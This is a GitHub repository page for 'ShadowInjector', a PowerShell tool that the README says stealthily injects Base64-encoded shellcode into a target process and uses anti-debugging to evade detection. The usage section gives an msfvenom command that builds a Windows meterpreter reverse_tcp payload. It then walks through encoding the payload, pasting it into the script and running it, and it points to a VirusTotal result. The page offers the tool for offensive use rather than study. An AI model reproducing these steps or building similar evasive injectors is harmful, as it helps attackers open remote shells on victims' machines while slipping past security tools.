Skip to content

A sophisticated PowerShell script that stealthily injects Base64-encoded shellcode into the target process, featuring anti-debugging techniques to evade detection.

Notifications You must be signed in to change notification settings

okankurtuluss/ShadowInjector

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 

Repository files navigation

ShadowInjector

A sophisticated PowerShell script that stealthily injects Base64-encoded shellcode into the target process, featuring anti-debugging techniques to evade detection.

Running the Script

You can create the malicious payload as follows.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port -f csharp

Perform the encode process by pasting the created shellcode into the "# shellcode will be written here" section.

Add the base64 encoded payload to the "add_shell_code_here" section of the script.

To run the script, open a PowerShell window and execute the following command:

.\ShadowInjector.ps1

Virustotal Result

About

A sophisticated PowerShell script that stealthily injects Base64-encoded shellcode into the target process, featuring anti-debugging techniques to evade detection.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published